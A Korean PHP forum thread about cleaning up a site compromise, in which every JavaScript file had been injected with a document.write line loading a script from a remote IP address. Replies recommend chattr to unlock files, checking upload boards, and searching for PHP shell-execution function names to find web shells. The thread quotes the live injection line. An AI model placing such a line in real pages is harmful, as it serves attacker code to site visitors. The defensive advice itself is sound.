사이트 내 전체검색
PHP
악성코드 처리 사례
로빈아빠
https://cmd.kr/php/764 URL이 복사되었습니다.

본문

악성코드 처리 사례
btn_scrap.gif 
 글쓴이 : 낯선그림자
icon_view.gif 조회 : 620  icon_good.gif 추천 : 0  
요새 악성코드때문에 고통받는 홈페이지들이 많습니다...

사례들이 여러가지 있을 것 같아 #1 붙여봤습니다.

#1. 
js디렉토리의 모든 js파일의 첫 줄에 다음과 유사한 코드가 들어가있습니다.

document.write("<script src='http://61.57.227.5/js/x.js?GMXZZQ'></script>");

이렇게 되면 크롬, 사파리, 불여우에서는 악성코드 포함된 사이트라고 못들어가게 막죠... -_-

js파일을 삭제나 수정하려고 하면 읽기전용이라 안됩니다.

그럼 읽기전용을 해제해야죠..

다음과 같이 하심 됩니다.

js]# chattr -i *

이렇게 하면 읽기전용이 해제되고요~

js파일을 수정/삭제할 수 있습니다~~~



//-------------------------------------------------------
하지만 문제는...
위와 같은 현상이 발생한 원인을 찾아서 해결을 봐야 한다는 겁니다. 그렇지 않으면 같은 상황이 반복될테니까요...


제 경우엔 data/file 디렉토리와 파일들에 문제가 보이더군요...
일일이 찾아서 삭제한다고 했는데 놓친 파일이 있을 수도 있으니 스트레스만 쌓여 갑니다...

노하우 공유 부탁드립니다~ ^^
-----------------------

chattr 해당 명령어로 js파일제한을 두어도 보안취약점이 존재하는한 모든파일을 컨트롤 하게 됩니다. 
즉 js파일 이나 css 등 메인페이지에 존재하는 파일들을 변경해서 코드 삽입을 하더군요... 

말씀하신 방법은 임시방편용일 뿐입니다. 
업로드가 가능한 게시판등을 좀더 자세히 살펴 보시길 바랍니다. 
확장자 체크(대소문자 구분) 등 구버전(에디터등)으로 사용되던 게시판이 있는지등을 다 체크해보셔야 할듯하네요.
absolute.gif
absolute.gif 루시올라 11-02-14 02:14
답변  
/data 폴더내에 
system, exec, passthru, escapeshellcmd, pcntl_exec, shell_exec 
이런 문자열을 포함하고 있는 파일들을 검색해서 확인 해보시면 웹셀툴을 찾으실 수 있을 겁니다.

댓글목록

등록된 댓글이 없습니다.

PHP
871 (4/18P)

Search

Copyright © Cmd 명령어 3.15.14.245